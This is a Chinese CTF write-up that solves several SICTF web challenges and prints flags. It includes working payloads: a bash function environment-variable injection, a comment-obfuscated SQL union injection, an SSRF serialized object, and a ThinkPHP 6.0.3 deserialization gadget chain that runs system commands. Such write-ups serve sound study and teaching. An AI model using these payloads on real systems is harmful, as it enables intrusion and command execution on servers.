获取中...

-

Just a minute...

by:Infernity

100%_upload

可真气死我了这道题,没注意看url,跟着标题走,一直在文件上传,一直在绕过滤,他要过滤也不过滤全,留个.user.ini没过滤,就一直围绕这个想办法,结果……

图片.png

打开题目,很明显的提示,index.php里有Include函数,那么我们直接上传一个jpg马,然后包含他就出来了。

图片.png

SICTF{ea391e30-b67e-4a5d-97ca-7c00f1bc107b}

Not just unserialize

新知识点,利用环境变量注入。

https://www.cnblogs.com/h0cksr/p/16189733.html

前面的反序列化这里不再赘述。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
class start
{
public $welcome;
public $you;
}

class SE{
public $year;
}

class CR {
public $last;
public $newyear='
worries';
}

class ET{
}

$a=new start();
$a->welcome=new SE();
$a->welcome->year=new CR();
$a->welcome->year->last=new ET();

echo base64_encode(serialize($a));

/^.(worries).$/

这个可以在前面加个空格绕过。

主要是这一段:

1
2
3
foreach ($_GET['get'] as $inject => $rce){
putenv("{$inject}={$rce}");
}

这里环境变量注入要看看上面的文章,有点复杂。

这里直接get[BASH_FUNC_echo%%]=() { cat /f*; }

即可拿到flag。

hacker

这道题考查sql无列名注入。

https://blog.csdn.net/m0_46230316/article/details/106668182

1
'/**/union/**/select/**/`2`/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flag)/**/as/**/a%23

过滤了空格,经过测试,一共有两列,而flag肯定在第二列,所以是2

SICTF{4fa6acc5-9d2c-4af8-908c-53b66839b019}

EZ_SSRF

他说有另一个文件,直接开扫!找到一个admin.php,进去看看

图片.png

意思是我们需要把ip改成127.0.0.1

这里正好原文里给了curl

图片.png

那直接以127.0.0.1开头进去就拿到flag了。

O:6:”client”:1:{s:3:”url”;s:26:”http://127.0.0.1/admin.php";}

最后base64解密

图片.png

SICTF{af8d34d5-22c4-414d-a78e-b65f587712f5}

Oyst3rPHP

最讨厌藏东西的题了,开局先扫,扫出来一个www.zip这是网站备份文件,里面会有源码,在app/controller/里找到源码,审计源码,第一步

1
2
3
$right = @$_GET['left'];
$left = @$_GET['right'];
if($right !== $left && md5($right) == md5($left)){

传?left=240610708&right=QLTHNDT

第二步

1
2
3
4
5
6
if(preg_match('/.+?THINKPHP/is', $key)){
die("Oysters don't want you to eat");
}
if(stripos($key, '603THINKPHP') === false){
die("!!!Oysters don't want you to eat!!!");
}

一般只有一个preg_match的判断,里面是一个die函数,用回溯次数绕过可以解,下面stripos函数需要我们的参数里有603THINKPHP,所以传一百万个a+603THINKPHP即可。

第三步就是反序列化了,这是thinkphp6.0.3有现成的poc,在网上一搜第一个就是

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
namespace think\model\concern;
trait Attribute
{
private $data = ["key"=>"cat /Oyst3333333r.php"];
private $withAttr = ["key"=>"system"];
}
namespace think;
abstract class Model
{
use model\concern\Attribute;
private $lazySave = true;
protected $withEvent = false;
private $exists = true;
private $force = true;
protected $name;
public function __construct($obj=""){
$this->name=$obj;
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{}
$a=new Pivot();
$b=new Pivot($a);
echo base64_encode(serialize($b));

post传参拿到flag

SICTF{c35c6cef-3fbb-41d3-9a53-1191b957a9f1}

相关文章
评论
分享
  • ByteCTF2024大师赛web部分wp

    ezobj源码: 12345678910111213141516171819<?phpini_set("display_errors", "On");include_once("...

    ByteCTF2024大师赛web部分wp
  • 第四届长城杯web全题解

    WEB SQLUS 猜测账户是admin密码是任意一个字符 登录进去后头像那边,可以上传文件,但是文件名里不能有p,尝试传入.htaccess然后传入一个txt当做php执行。 在头像前端看到了上传路径 flag没有权...

    第四届长城杯web全题解
  • NepCTF2024部分web

    NepDouble代码过长这里不贴了,看到上传压缩包的第一反应是做一个链接到/flag的软连接,上传上去解压就可以看到flag了,但是这里 12if os.path.islink(new_file): return &...

    NepCTF2024部分web
  • 2024第七届巅峰极客部分wp

    GoldenHornKing源码给了是很明显的ssti,在/calc路由里传参calc_req,黑名单是不能有:数字、百分号、非ascii之外的字符。最烦的是这个access,原本是False,可以不用管,但是一旦成功执行一...

    2024第七届巅峰极客部分wp
  • 2024春秋杯部分wp

    brother打开题目是?name=hello,还回显了hello,看一下后台语言和框架 一眼ssti模版注入, 1?name={{g.pop.__globals__.__builtins__.__im...

    2024春秋杯部分wp
  • PolarCTF2024夏季个人挑战赛wp

    扫扫看不用扫,猜测是flag.php flag{094c9cc14068a7d18ccd0dd3606e532f} debudaoflag在cookie里: flag{72077a55w312584wb1aaa88888cd...

    PolarCTF2024夏季个人挑战赛wp
  • PolarCTF2024春季个人挑战赛wp

    机器人打开页面: 一眼robots.txt 123User-agent: *Disallow: /27f5e15b6af3223f1176293cd015771dFlag: flag{4749ea1ea481a5d 只有...

    PolarCTF2024春季个人挑战赛wp
  • 第九届中国海洋大学信息安全竞赛web题解

    ezPHPparse_str()可以进行变量覆盖。 全部流量包: 菜狗工具#1python继承链攻击。 1print(().__class__.__base__.__subclasses__()[132].__init__.__gl...

    第九届中国海洋大学信息安全竞赛web题解
  • DASCTF2024校赛

    cool_indexserver.js: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525...

    DASCTF2024校赛
  • XYCTF2024

    ezhttp打开是登录页面,先看源码,源码提示: 1<!-- 为了防止忘记密码,我把它们放在某个地方了 --> 第一反应是robots.txt,进去看看。 得到/l0g1n.txt,进入得到帐号密码: 12u...

    XYCTF2024